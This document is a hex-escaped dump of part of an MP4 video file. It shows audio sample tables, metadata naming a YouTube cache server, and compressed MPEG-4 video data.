\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00
\x00\x00\x01\x00\x00\x04\xF9\x73\x74\x62\x6C\x00\x00\x00\x69\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00
\x59\x6D\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x56
\x22\x00\x00\x00\x00\x00\x35\x65\x73\x64\x73\x00\x00\x00\x00\x03\x27\x00\x00\x00\x04\x1F\x40\x15\x00\x00\xD4\x00\x00\x68
\x50\x00\x00\x5D\xF8\x05\x10\x13\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\x02\x00\x00\x00\x18
\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xEE\x00\x00\x04\x00\x00\x00\x00\x34\x73\x74\x73\x63\x00\x00
\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x01
\x00\x00\x00\x18\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x03\xCC\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\xEE\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\xD4\x00\x00\x00\xB2\x00\x00\x00\xA4\x00\x00\x00\x91\x00\x00\x00\x90
\x00\x00\x00\x92\x00\x00\x00\x90\x00\x00\x00\x92\x00\x00\x00\x96\x00\x00\x00\x89\x00\x00\x00\x82\x00\x00\x00\x84\x00\x00
\x00\x9A\x00\x00\x00\x8B\x00\x00\x00\x92\x00\x00\x00\x89\x00\x00\x00\x80\x00\x00\x00\x7B\x00\x00\x00\x7E\x00\x00\x00\x87
\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x82\x00\x00\x00\x81\x00\x00\x00\x9D\x00\x00\x00\x9A\x00\x00
\x00\x88\x00\x00\x00\x80\x00\x00\x00\x87\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x85
\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x8A\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8C\x00\x00
\x00\x8C\x00\x00\x00\x85\x00\x00\x00\x95\x00\x00\x00\x88\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00\x82\x00\x00\x00\x88
\x00\x00\x00\x93\x00\x00\x00\x8A\x00\x00\x00\x92\x00\x00\x00\x86\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x86\x00\x00
\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x89\x00\x00\x00\x89\x00\x00\x00\x88
\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x86\x00\x00\x00\x8E\x00\x00
\x00\x87\x00\x00\x00\x8C\x00\x00\x00\x8C\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x90
\x00\x00\x00\x85\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
\x00\x8D\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x88\x00\x00\x00\x93\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x84
\x00\x00\x00\x90\x00\x00\x00\x7F\x00\x00\x00\x8A\x00\x00\x00\x90\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00
\x00\x93\x00\x00\x00\x7B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8B\x00\x00\x00\x98
\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x8F\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
\x00\x9B\x00\x00\x00\x83\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x84\x00\x00\x00\x8C\x00\x00\x00\x85\x00\x00\x00
\x8E\x00\x00\x00\x95\x00\x00\x00\x92\x00\x00\x00\x8E\x00\x00\x00\x84\x00\x00\x00\x8B\x00\x00\x00\x8A\x00\x00\x00\x89\x00
\x00\x00\x82\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x86\x00\x00\x00\x8A\x00\x00\x00\x81\x00\x00\x00\x90\x00\x00\x00
\x85\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x93\x00\x00\x00\x91\x00\x00\x00\x85\x00\x00\x00\x81\x00\x00\x00\x81\x00
\x00\x00\x85\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8F\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00
\x90\x00\x00\x00\x8F\x00\x00\x00\x86\x00\x00\x00\xA1\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x81\x00\x00\x00\x91\x00
\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x92\x00\x00\x00\xAE\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00
\x8F\x00\x00\x00\x85\x00\x00\x00\x90\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x8B\x00
\x00\x00\x86\x00\x00\x00\x8F\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x97\x00\x00\x00\x86\x00\x00\x00
\x85\x00\x00\x00\x8C\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00\x8E\x00
\x00\x00\x87\x00\x00\x00\x7F\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x86\x00\x00\x00\x8D\x00\x00\x00\x90\x00\x00\x00
\x83\x00\x00\x00\x8F\x00\x00\x00\x91\x00\x00\x00\x9A\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8B\x00
\x00\x00\x87\x00\x00\x00\x87\x00\x00\x00\x85\x00\x00\x00\x93\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00
\x8A\x00\x00\x00\x89\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x8B\x00
\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00
\x90\x00\x00\x00\x8D\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x98\x00\x00\x00\x88\x00\x00\x00\x70\x73
\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x20\x75\x00\x00\x34\x8D\x00\x00\x4A\x6C\x00\x00\x5D\x6E\x00\x00
\x6F\xB9\x00\x00\x81\xD3\x00\x00\x95\x04\x00\x00\xAA\x08\x00\x00\xBC\x87\x00\x00\xD1\x10\x00\x00\xE3\x23\x00\x00\xF6
\x8C\x00\x01\x06\x59\x00\x01\x17\x06\x00\x01\x26\x33\x00\x01\x34\x91\x00\x01\x43\xFC\x00\x01\x50\xEF\x00\x01\x60\x07\x00
\x01\x6D\xF6\x00\x01\x7C\x33\x00\x01\x90\x1B\x00\x01\x9F\xE9\x00\x01\xAA\x87\x00\x00\x02\xF3\x75\x64\x74\x61\x00\x00\x02
\xEB\x6D\x65\x74\x61\x00\x00\x00\x00\x00\x00\x00\x21\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x64\x69\x72\x61
\x70\x70\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xBE\x69\x6C\x73\x74\x00\x00\x00\x19\x67\x73\x73\x74\x00\x00
\x00\x11\x64\x61\x74\x61\x00\x00\x00\x01\x00\x00\x00\x00\x30\x00\x00\x00\x1D\x67\x73\x74\x64\x00\x00\x00\x15\x64\x61\x74
\x61\x00\x00\x00\x01\x00\x00\x00\x00\x31\x31\x31\x39\x31\x00\x00\x00\x38\x67\x73\x73\x64\x00\x00\x00\x30\x64\x61\x74\x61
\x00\x00\x00\x01\x00\x00\x00\x00\x42\x42\x43\x35\x44\x41\x45\x30\x37\x48\x48\x31\x33\x34\x39\x33\x37\x31\x38\x39\x31\x39
\x32\x31\x35\x30\x33\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x75\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00\x00\x01
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x6D\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00
\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x18\x67\x73\x68\x68\x00\x00\x01\x10\x64\x61\x74\x61
\x00\x00\x00\x01\x00\x00\x00\x00\x6F\x2D\x6F\x2D\x2D\x2D\x70\x72\x65\x66\x65\x72\x72\x65\x64\x2D\x2D\x2D\x73\x6E\x2D\x61
\x30\x6A\x70\x6D\x2D\x61\x30\x6D\x65\x2D\x2D\x2D\x76\x32\x30\x2D\x2D\x2D\x6C\x73\x63\x61\x63\x68\x65\x37\x2E\x63\x2E\x79
\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x9F\x26\x6D\x64
\x61\x74\x00\x00\x01\xB3\x00\x10\x07\x00\x00\x01\xB6\x10\xC3\x63\x0A\x8D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3
\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF1\x36\xA1\x6E\x1B\x17\x50\x91\x96\xE1\xB1\x73
\xCE\xCB\xD9\xDE\x58\x49\x51\xBA\x59\xA4\xAA\xCF\xA2\x3A\x2E\xD0\x93\x0E\x7C\x6C\x5D\x42\x4A\xD3\x93\x16\xE1\xB1\x75\x09
\x19\x6E\x1B\x17\x3F\x7E\x48\xCB\x70\xD8\x52\xCB\x70\xD8\x53\x9C\xE8\x65\xB8\x6C\x29\xA1\x05\xAE\xF1\x4A\xFC\x52\x8A\xA2
\x44\x8F\x87\xBA\xCD\xB5\x7E\xB4\xB2\x1B\x58\x8F\xE6\xE1\xFB\x5D\x50\xA5\x72\x8D\x42\x26\x82\xDC\x36\x14\xC8\xE0
\x3D\x2D\xE9\xA5\x85\x09\x7C\x8C\xB7\x0D\x8B\x9F\x94\xE1\xB0\xA7\x69\x24\x6A\x70\xD8\x52\xD4\xE1\xB0\xA5\xBE\xCD\xCB\x70
\xD8\x53\x94\xE1\xB0\xA5\xA1\x82\x79\xF9\x1A\x97\x35\x2E\xCF\x92\x35\x2E\x6A\x5C\xF7\x8B\x2A\xDE\x1D\xB9\xB2\x90\xD1
\xFB\x92\x4E\x86\x41\x26\x60\x29\x77\xBE\x6C\x6E\xEA\x0B\x24\xE7\x0D\x10\xC2\x9D\x02\x14\x68\xD9\xF2\xBF\x48\x44\xDC\xB7
\xE0\x42\x8D\x39\x6E\xF4\x6D\x46\x93\x3E\x2F\x63\x37\xD5\xFA\x81\x46\x0F\x7A\x36\x39\x83\xD3\x41\x5C\x97\xC1\x8F\xE1\x06
\x2C\x4F\x7B\xE6\x68\xDA\xFB\x29\x2A\xE1\x33\x0F\x99\x51\x9D\x66\x29\x43\x73\xD0\xED\x4B\x90\xB6\xCF\xA0\x58\x1B\xD0
\xAB\xEE\xB1\xE5\xBE\xDC\xCB\xC4\x57\x64\x58\x51\xF5\xCB\x3E\xB8\x32\x91\xE6\x03\x01\x59\x4A\x27\xF4\x32\x30\x9B\x05
\xEA\x95\xD5\x0D\x5E\xD4\x68\xAC\x0A\x7E\x46\x7F\x1F\x29\xA4\x85\x07\xBE\xD7\x8F\x36\xE5\x8F\x37\xF8\x0B\xCD\x82\xAD\x20
\x73\x69\x47\xB4\x24\x9F\x17\xB1\xF6\xE3\x50\xB7\xB4\xDC\x92\x22\xE9\x39\xB2\xCE\x50\x60\x29\x09\x4B\x3A\x14\xA1\x93\xA8
\x9B\x5C\x18\xA2\x60\x64\x75\x94\x4C\xD2\x49\x8C\x00\xD3\x76\xCE\xB3\x4D\xEF\x2E\xA2\xE9\x04\x88\x0D\x4B\x73\x66\xD9
\xAB\x76\xFF\x5F\xAE\x4C\xCB\x93\x08\x97\xC5\x1A\xF6\x7B\xB3\xD3\x93\xA1\x32\x68\x82\xCA\xDA\x78\x68\x3D\x4A\xCB\x53\xC5
\x96\x4E\xDB\x2A\xD2\x85\x2A\x05\xE6\x44\xB0\xEB\xC0\xAF\x09\xB5\x12\xA3\x04\xC3\xD4\xBF\x57\x26\xB3\x6C\x5D\x62\xA9\x05
\xCE\x0A\x87\x12\x03\x07\x7E\x29\xA1\x93\xFC\x82\x7F\x8C\xCB\xE7\x6D\x0D\x30\x27\x69\x2B\xCE\xDA\x1A\x06\x0F\xB4\x58\x79
\x26\x76\x7C\x35\x3C\x4D\x22\xA5\x09\x4B\x71\x68\x59\xB2\xC1\xA6\x11\x97\x8C\x82\xBE\x05\x04\x1A\x85\x62\x67\x91\x89
\x9B\x69\x63\x7D\xBB\xC7\x9F\xD7\x8F\xB7\xE5\x16\xCD\xD9\x6C\x5B\xF6\xA1\x51\x08\xD6\x8D\xF9\x4F\x31\xAB\x74\xA6\x10\xD7
\x5B\x9B\x97\x3D\xBC\xE0\xD3\x28\xCC\x6F\x1B\x5A\x77\x61\x6C\xE9\x2F\x42\xD4\x56\xCB\x29\x67\xB9\x0B\x32\x76\x2C\xA7\xE7
\x1D\xF2\x55\x39\x3A\xAA\x29\xEA\x0B\xA4\x51\x55\xA6\x1C\x16\x7F\x57\x86\x97\x3D\x71\x3F\x14\x0D\xF7\x92\xF0\x3C\x47\xD1
\x4D\x19\xBE\x1E\x0D\xC7\xD4\x33\x3F\xCD\x57\x7D\xD4\x39\xE7\x15\x6B\xD7\xDB\xFE\xB2\xDB\x65\x50\x3B\x40\xB9\x02\x3F\xF9
\x6C\x5D\xA0\xC2\x9D\x31\x7E\xCE\x6A\x8E\x49\x79\xCE\xFF\x48\x1D\x68\x6C\x5E\xF3\x56\x84\xED\xA1\xB8\x7D\x84\x35\x87\x00
\xAF\xA1\x42\x7B\xBF\xF3\x57\x55\xDC\x5A\x81\x4E\xAD\x01\x36\x37\x6D\x64\xBB\x79\x19\x9A\x20\xF2\x6A\x29\x54\x12\xAC\xA7
\x38\x42\x42\x03\xFF\x57\x13\x02\xD2\x62\x50\xF1\x9D\x6D\xA4\xF7\xDC\x55\x3F\xDE\xDB\x22\x92\x88\x8E\xC3\xE6\x33\x62
\x9E\x67\x49\x49\x85\x6A\xD5\xAB\xA2\x50\x7F\x00\xC3\x2C\x7F\x9F\x44\xBC\xEA\x8E\x9A\x45\xB8\xF3\xE1\x01\xBD\x67\xD7
\xFF\xE7\x54\xEE\x76\x08\xB3\x39\x43\x37\xD5\x5E\xD8\x4C\x56\x5F\x27\xD2\xB6\x41\x50\xD0\x38\xAA\xBC\x57\xFD\x51\x87\xC6
\x8D\xA5\x53\x47\xF6\xAD\xD4\x91\x12\x2E\xE2\x9C\x07\x15\xBA\x97\xD5\xCF\x0B\xD4\x08\x14\x19\x18\x3B\xD4\x29\xCD\x23\x13
\x2A\x24\x77\x35\xB2\x5C\x9C\x19\x3C\x66\x5C\x9C\x41\x1D\xD9\x81\xD7\x98\xF8\xCE\xF7\x3B\x42\x45\x58\xDB\x12\x6F\x8D\xB6
\xE7\x1E\x6F\xFC\x1A\xE4\x31\xBA\x3E\xC3\x41\x26\xC0\xB4\xCA\x79\xAC\x2B\xCF\x2F\x72\xCE\xA9\xD5\xFA\x37\xA1\x22\xE3\xA6
\x76\xB2\xA3\x79\x65\xCE\xA2\x45\xC0\x94\xB0\xE5\x56\xCF\x26\xDD\xC0\x54\x29\x53\xB4\xD4\x0F\x6C\x8B\xD2\x24\xB3\x1A\x61
\xB1\xC4\x61\x46\xA8\xEA\x99\xEC\x93\x61\x26\xAF\x6F\x10\xB9\xAF\x49\x1F\x62\x3D\xB8\x06\xBE\x1E\x4E\xF1\x6B\x86\x10\x67
\x3A\x32\x62\xA8\xA0\xA9\xEA\xC7\x53\x8C\x56\x58\xCF\xE6\xD9\xD8\x36\x13\xAC\x06\xBD\xB7\x94\xB5\x42\x8B\xDE\xFE\xF5
\x4C\x22\x8B\x75\x3F\x66\x28\x67\x9D\xCF\xE7\x37\xB0\xAE\x4D\x46\x4E\x93\x7F\x54\xCE\x28\x46\x6A\xC2\x08\x61\x23
\x1A\x9B\x0A\x94\x37\xB8\x37\x25\x5C\x2A\xF9\xBC\xCF\xB1\xB9\x33\xF3\x2A\x29\x17\x58\x54\x59\x36\x59\x44\xD5\x90\x73\x87
\x8B\x30\x9A\x2A\xD2\xFC\xAB\xCC\x50\x9D\xAC\x05\x45\x9B\xEB\xC2\x85\xF0\x69\xB1\x65\x89\x20\x50\x4B\x7D\x6A\x7B\xF1\x13
\x58\xC6\x38\x87\x14\x6D\xFF\x49\x7B\x56\xE1\x32\x98\x0B\xE1\x9C\x50\x25\x2B\x8A\x7B\x97\x2E\xF8\x93\x2D\xCB\x8E\xE2\x47
\x31\x32\x60\x54\xEB\x61\x9E\x83\x04\x83\x01\xFF\xC7\x09\x1B\x49\x46\xFD\xC2\xC2\x56\x94\xF4\x5C\x14\x1A\x48\x5E\xA1\x37
\x39\xDA\x99\xBC\xDC\x25\xCD\xB7\xB0\xA6\x15\x89\x97\x80\x90\xD9\xA2\xF6\x47\x19\x09\x6F\x06\x68\x1C\x92\x55\x59
\xAA\xBA\xA3\x8D\xC8\xA4\x31\xB0\x95\xC2\x81\xFF\x8B\x53\x6A\x89\xDA\x55\xB0\x6A\x89\x74\xBF\x55\x4B\x51\x95\xE0\xC9\x42
\xD1\xEE\x40\xE0\x97\x6A\x4B\x1E\xB8\x1E\x6B\x8D\xB7\xA1\xB7\x05\xEE\x37\x16\xBC\x13\x30\x81\xFB\x59\xFE\x08\x85\x9B\xA4
\xA3\x7C\x71\xE4\xC6\xDE\x69\x63\x79\xBE\xC5\x6F\x53\xEF\x47\xBD\xB4\x90\x1C\x50\x13\xEC\x47\xF2\x98\x0E\x50\xE4\xFC\x88
\xC9\x68\x61\x1C\xDD\x9C\x6C\xBB\xFF\xFC\xE2\x89\x14\x49\xDD\xA8\x46\x47\xC5\x8C\x2D\xE2\xC6\x7F\x9F\xFC\x45\x64\xDB\x79
\xC4\x3D\x21\x23\x85\x72\x5B\xDC\x2D\xF4\xED\x80\xE3\x47\xD7\xF6\xAA\x0F\xD4\x42\xDD\xD2\xCB\x66\xDD\x59\x44\x88\xB8
\x8D\x4D\x14\x4C\x36\x23\x9F\x51\x93\x33\x2A\xCB\x11\x57\x54\xDD\x2A\x2B\x83\x70\x4C\xD2\xD9\x27\x25\xE0\x62\x14\xC6
\x2D\xBF\xB5\x15\x5D\x74\x76\xA2\x09\xA1\xD6\x13\xA6\xE4\xB2\x48\xA7\x33\x21\x3D\xB4\x06\x5B\xA1\xED\x03\x1B\xCE\x70
\xAB\xF3\x9D\xEF\x44\xF5\x5B\x88\x6E\x42\x45\xDE\x83\x57\x25\x51\x10\xF6\x91\x30\x9F\x82\x92\xFC\x3F\x9F\x35\x13\x17
\xAB\x4C\xD2\xB9\x07\x33\xB7\x38\x0E\x23\x81\x03\xD3\xCA\x0B\x32\x79\x0E\x48\x79\x3C\xD1\x05\x89\xF4\x43\x79\x40\x96
\xDC\x09\x8B\xA0\x3A\x61\xFC\xB4\x37\x0B\x73\x84\x46\x63\x41\xF7\x57\x5B\x7B\xDB\x56\xE5\x88\x86\x27\x69\xAA\xA5\xA9\x41
\xC8\xAD\x81\x31\x6F\xE7\xDB\x97\x16\xCC\xAB\x54\x2F\xD9\x62\x31\x7A\x37\x9D\x07\x7E\xDD\xA2\x76\x21\x03\x01\x7F\x83\x06
\x80\xE2\xB3\x11\x32\xF8\x73\x95\x6B\xEF\xF3\x4A\x17\x17\x3F\x04\x00\x64\x7A\x0C\x0A\xE0\x71\x59
\x8F\x8D\xBC\xED\x8A\xDB\xA7\xF9\x45\x9F\x52\xFF\x94\x8A\xE3\x87\xD5\xE8\xA8\x5A\xD7\xB0\x8B\x49\x4D\xD2\x3D\x67\x4E\x50
\xE3\x09\x41\x1D\xEF\x13\x5C\x3D\x1C\xB4\xDB\x7B\xCA\x59\xE8\x38\xB1\x7D\xA2\x28\x79\x16\xF6\x53\x74\xF0\xBF\xD7\x2F\x87
\x39\xEE\x6D\xEA\xC3\x6D\x59\x00\x2F\x82\xA0\x2A\x93\x01\x00\x70\x7A\xD8\x3E\x6F\xFF\x7E\x0F\x12\x62\x2F\x55\xCD\xB2
\xAE\x83\x94\xB6\xFC\xEA\xB6\x6E\x07\xBC\x06\x47\x7B\xE9\xBC\xF1\x28\xC0\x6B\x12\x72\xD2\xAF\xE0\x6A\xA2\xEC\x86\xD6
\xBB\x0E\xA7\x89\x98\xC1\xB6\x22\xC9\x83\x7F\x8D\xA2\x28\xB9\x9C\x1F\x35\xDB\x54\x23\x9C\xAB\xEA\x21\xAC\x3A\xE7\x85\xE5
\xB3\x30\x73\x38\x88\x40\xE8\xCD\x4C\x0A\xD2\xE7\x2F\x60\xD3\x87\xCC\x07\x02\xFD\x09\x70\x80\xD1\xA0\x76\xE8\x4B\xA8\xB6
\x79\x50\xAD\x4D\x11\xBE\x1E\x82\xCC\x34\x14\xD5\x61\xAD\x9C\xB9\xD9\x49\x68\x4A\xF9\x70\xD6\x34\x38\x2C\xC1\xB4\xB4\x63
\x75\x48\x52\xB6\xF7\x77\x99\x20\x9E\xA2\xA6\x31\x16\x0B\xF4\x25\xC1\xF3\x5D\xEA\x85\xCA\x74\x25\x66\x5F\x8B\xA3\x15\x54
\x8B\x1E\x51\x8B\xA3\x7A\x50\x59\x86\x85\xEF\xA1\xC7\x91\xF0\x5F\xA1\x2C\x4B\x0A\x2A\xD3\x34\x97\x14\x37\x16\xEF\x4D\x51
\x8C\x5C\xF3\x61\x23\x0A\x80\xB7\xA6\x2D\xCE\xAF\xDE\x14\xDB\x5F\x8B\x30\xD0\xBE\x84\xB4\x20\x34\x6A\x83\x0C\x5B\xE0\xC1
\x49\xE4\x71\x4C\xDC\x96\x61\xA1\x7B\xD9\x66\x1A\x17\xBF\x82\xB1\xA9\x37\xAA\x56\xE2\x8D\xB8\x0B\x12\x8B\x08\x99\x66
\x1A\x0A\x59\x66\x1A\x17\xBF\xE9\x89\x65\x98\x68\x29\x65\x98\x68\x29\xA9\x4F\x96\x59\x86\x82\x96\xA3\x0D\x05\x33
\x8C\xAB\x6D\x64\x6D\xB7\x97\x1B\x6D\xFC\x6D\xB7\x78\xDB\x6E\x71\xB6\xDF\xC6\xDB\x7F\x1B\x6D\xFC\x6D\xB7\xF1\xB6\xDF\xC6
\xDB\x73\x7F\x00\x00\x01\xB6\x51\xE2\x07\xFF\xB8\xAE\x0A\x72\x5C\x7C\xB3\x61\xAF\x28\x8A\x47\xA6\x5D\x77\x2E\x56\x38\xF8
\xE3\x17\x2B\x95\xD5\x85\x24\x7C\xBF\xCB\xE5\xE5\x55\x7D\x8C\x56\xFB\xEE\xAE\x5F\x75\x7D\xF2\x5F\x3B\xA5\x0B\xBD\x3D\x36
\x2D\x47\x14\xD9\x76\x6D\xA5\x26\xF7\xC5\xEF\xF7\x49\xF7\xDA\xF5\xA7\x92\xE9\x2B\xFE\xC6\xAC\x4F\xF2\x81\x6A\xD8\xD8
\xEF\x4B\x05\x64\x27\xBA\x8D\x64\x25\x75\xE1\x80\x84\x2C\x2A\x68\xFD\x06\x27\x09\x77\x97\x16\xD7\x6E\xD1\x69\xA9\xD0\x49
\xD7\x9B\x3F\xCB\xFC\x9B\xB6\x56\xFA\x1A\x90\x11\x14\xFD\x67\x21\xE5\x5F\x57\x15\x0F\x35\xAF\xD5\x04\x3A\x75\x29\x4B\xC4
\xB9\x83\xF5\x64\x62\xAB\x6D\xDB\xA6\xF7\x24\xD8\xAF\x7D\xF7\xCB\x0D\x48\xA0\xF2\xB4\xCE\x1B\xF9\x31\x3B\xEE\xB3\xA5\x59
\x29\x84\xAE\x7F\xFF\x7F\x00\x00\x01\xB6\x52\xC2\x27\xFF\xBA\xB8\x37\x2A\xC3\x70\xD9\x3F\x2B\x45\x2C\x11\xB8\x57\x70
\xDD\x52\x6B\x9E\xDE\x9E\x75\x71\x37\x15\x4C\x68\x32\x59\x42\x87\x15\xEF\xA9\xB4\x18\x8C\x94\xCD\x96\xA1\xC1\x83\xD9\xD0
\x4D\x09\x64\x15\xAF\xEB\x02\xC2\x42\xC1\xEA\x17\x0A\x4D\x2A\x74\xA2\xEF\x5B\x01\x2C\x6C\x13\x2E\x93\x64\x83\x34\xCD\xB5
\x0D\xC9\x26\x6C\xBB\x2F\xC7\xA2\x9E\x16\x08\xF8\x94\xDF\x17\x6B\xF6\xA8\x58\x46\xE3\xCC\x73\x65\xF3\xE0\xA2\xA9
\xDE\xDE\x75\xB6\x86\xE5\x83\x31\x69\x32\xE6\x8B\xAD\xFC\x19\x2D\xCC\x59\xB1\x82\x98\x26\x48\xCA\x51\x76\xE2\xAC\x26\xF4
\xD4\x94\x94\x2B\x01\xA9\x34\xC4\x29\xC8\x56\xBD\xAD\xC1\x99\x13\x33\xF0\x16\xE6\x30\x8C\x14\x4C\xA4\x18\xCC\x12
\xBF\xDA\x3C\xAC\x0E\xF2\x14\x15\x9E\x7B\x12\xE9\xA7\x91\xBA\x39\x11\xCF\x83\x14\xFA\x8C\xD3\x24\x1C\x51\x7E\x08\xD2
\xCE\xF8\x2E\xB3\xDB\x00\xA5\x06\x1B\x0B\x08\x94\x34\xAD\xF9\x48\xE5\xD8\x4E\xC2\x8D\x67\x85\xA6\x8D\x31\x3F\xAB\x54\x07
\xBF\xFF\x13\x0A\xFB\x86\xA1\x61\xCB\x80\x53\xB9\x07\xF9\x53\x69\xB1\x31\x36\x18\x0F\x61\x7D\x87\xC8\xC6\x6C\x39\x21
\x1B\x19\x20\x31\xA5\x2A\x72\xC9\x90\xCD\x68\xD9\x93\x55\x10\x90\x25\xC5\x10\x7A\xDA\x91\xD2\x3F\x5D\x9F\x44\x7E\x51
